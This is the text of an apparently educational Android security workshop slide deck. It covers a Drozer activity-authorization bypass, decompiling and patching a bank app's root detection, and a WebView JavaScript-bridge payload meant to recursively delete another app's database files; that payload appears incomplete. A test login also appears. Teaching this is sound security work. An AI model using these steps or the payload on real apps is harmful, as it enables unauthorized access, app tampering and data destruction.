The document discusses various techniques for analyzing and exploiting Android applications, including using Drozer to bypass activity validation, replicating data exposure issues across apps, reversing APKs to analyze and patch detection of root access, exploiting vulnerabilities in app webviews through injected JavaScript, and demonstrating API attacks. The presentation encourages participation in the security community to share knowledge and ideas.

2. WHO AM I
Next Generation problem Solver
Researcher & Reader in free time
Speaker at
Facilitator at Weekend Testing
Bug bounty Hunter (eX .Crowd Tester)
Reported Security Vulnerabilities for 50+ unique customers all over the world
including Apple, yahoo, Outlook, adobe & etc.
Love to develop nasty code & Hack it :)
Works as Security Researcher at
Certified Ethical Hacker AKA. Bug Wrangler
Null & OWASP Co mmunity
Accenture Digital Mobility

3. DISCLAIMER
This Presentation is intended for educational purposes only and I cannot be held liable for
any kind of damages done whatsoever to your machine, or other damages.
Please - Don't try this attack on any others system without having context knowledge or
permission, this may harm to someone directly or indirectly.
Feel free to use this presentation for practice or education purpose.
It's no way related to my employer - its my own research and ideas.
^ I hope - You gotcha ^

4.
HUMLA
MEANS 'ATTACK' IN HINDI

9. SOCIAL MEDIA FEED
Hashtag for this session
#NullHumla, #MobileSecurity
: Twitter handle for feedback :
@ @null0x00 Abhinav_Sejpal

10. ???
~ WE AREN'T GOING TO DO THIS ~
So, feel free to stop when you have a doubt!
Are you Ready to Rock

11. Android Smartphone to IOT

12. The Mobile market is fragmented, stakeholders want their
better cheaper faster mobile app - Correct?
What is if it's has Vulnerable code? WOW :D
- Yet to update the stats -

14. ANDROID PACKAGE - APK

15. DEVELOPMENT PLAN

17. ANDROID ARCHITECTURE

18. MY HOME IS YOUR APK

22. OUR ARSENAL

24. PREREQUISITES CHECKS
Genymotion Emulator
Santoku Linux / Appie / Android Tamer
Copy of Shared APK(s) : Here

30. DROZER FRAMEWORK
INTRODUCTION
Drozer Server
Drozer Agent

32. BYPASS THE ACTIVITY VALIDATION
run app.activity.start --component sh.whisper
sh.whisper.WInboxActivity

33. Self-Practice Session
Challenge 1 – Bypass the fix authorization for the whisper
App

38. nulltest2015@yahoo.in - Password!

42. ADHOC FORENSIC ANALYSIS

43. Can we replicate this issue for the LinkedIn / Hike App ?

44. Linkedin Insecure data stroage

46. INSTALL THE BANK APP
Oh No - I can't use the App due to rooted device :(

47. Smali code Analysis
Step 1. Reversing the APK to the JAR File (JavA file)
dex2jar-2.0/ d2j-dex2jar.sh bank.apk

48. STEP 2
READ JAR USING JD-GUI
jd-gui bank-dex2jar.jar

50. STEP 3
Reversing the apk to the smali code
java -jar apktool_2.0.0.jar d bank.apk

51. 4. LOCATE THE CODE WHICH DETECTS THE
ROOT

53. 5. LOCATE SAME LOGIC IN JAR

54. STEP 6. PREPARE LOGICAL PATCH
We can't patch the Java code and get the binary
- We have to patch the smali code with new logic of
isRooted

55. 7. NEW LOGIC IS AVAILABLE IN SMALI

56. 8. FIX THE SMALI CODE
9. Rebuild the binary

57. 10. CREATE SELF-SIGNED
CERTIFICATE
http://developer.android.com/tools/publishing/app-
signing.html

58. 11. SIGN APK WITH JAR SIGNER
12. CHECK - ROOT DETECTION
* Updated apk has patched code *

60. ~ SUMMARY ~
Demo on Missing Root Detection - Done
Demo on Reversing the APK - Done
Demo on rebuild the APK - Done
Demo on weak Binary - Done
Fix : Use the Dex Guard not the pro guard
Update the logical validation - Done
Identify attack surface at Smali code - Done
Demo on Patch the Smali code - Done
Demo on APK signing - Done
Finally done the root detection bypass - Done

61. ANDROID WEB-VIEW
Android allows apps to create a bridge in order to render
HTML , javascript code and allow interacting with the java
codes of the application using WebKit open source web
browser engine
70 % of applications use WebViews

63. THERE IS TWEAK WITH USAGE
DISABLE SUPPORT FOR JAVASCRIPT
DISABLE SUPPORT FOR PLUGINS
DISABLE FILE SYSTEM ACCESS

64. WELL - HTTP VS HTTPS
WEBVIEW = NEW WEBVIEW(THIS);
WEBVIEW.GETSETTINGS().SETJAVASCRIPTENABLED(FALSE);

65. IDENTIFY THE APP WITH THE WEBKIT
- Reverse the binary -
Find the webview code with addJavascriptinterface
enabled
- Remember it's smali code -

66. IDENTIFY AND UNDERSTAND THE ACTIVITY WITH JAVASCRIPT ENABLE AT CLEAN JAVA CODE

67. VERIFY NETWORK IS MALICIOUS ?
HTTP VS Vulnerable HTTPS VS HTTPS

68. Edit the Response from cloud server (Man In middle)

69. MALICIOUS JS VECTOR
<script>
var path = ' /data/data/com.box.android/databases/---';
function execute(cmd){
document.write("WebView Vulnerability");
return window.Android.getClass().forName('java.lang.Runtime')
}
execute([' /system/bin/rm', '-R', path]);
</script>

70. BOOM - COMMAND HAS EXECUTED SUCCESSFULLY

71. BYPASS THE ACTIVITY
+
API ATTACKS WITH VK APP

72. YES - I'M DONE!
Feel free to write me at bug.wrangler at outlook.com
Or
Tweet me at Abhinav_Sejpal

73. We need you!
Attend Null Meets-up & give presentations.
Share your ideas & leanings.
Talk to our community champions.
Your feedback helps us to build a good community.
Looking forward for your ongoing support.
http://null.co.in/
Say 'Hello' @null0x00

74. ! THANK YOU !
@anantshri @oldmanlab @adi1391 @prateekg147
@5h1vang @exploitprotocol
#Nullblr Leads & Champions
Big thank you to @null0x00, Satish, Apoorva & you All

75. LICENSE AND COPYRIGHTS
copyrights 2015-2016
https://slides.com/abhinavsejpal/bangalore-android-null-
humla/ Abhinav Sejpal
-----
( CC BY-NC-ND 3.0)
Attribution-NonCommercial-NoDerivs 3.0 Unported
Dedicated to my lovely daddy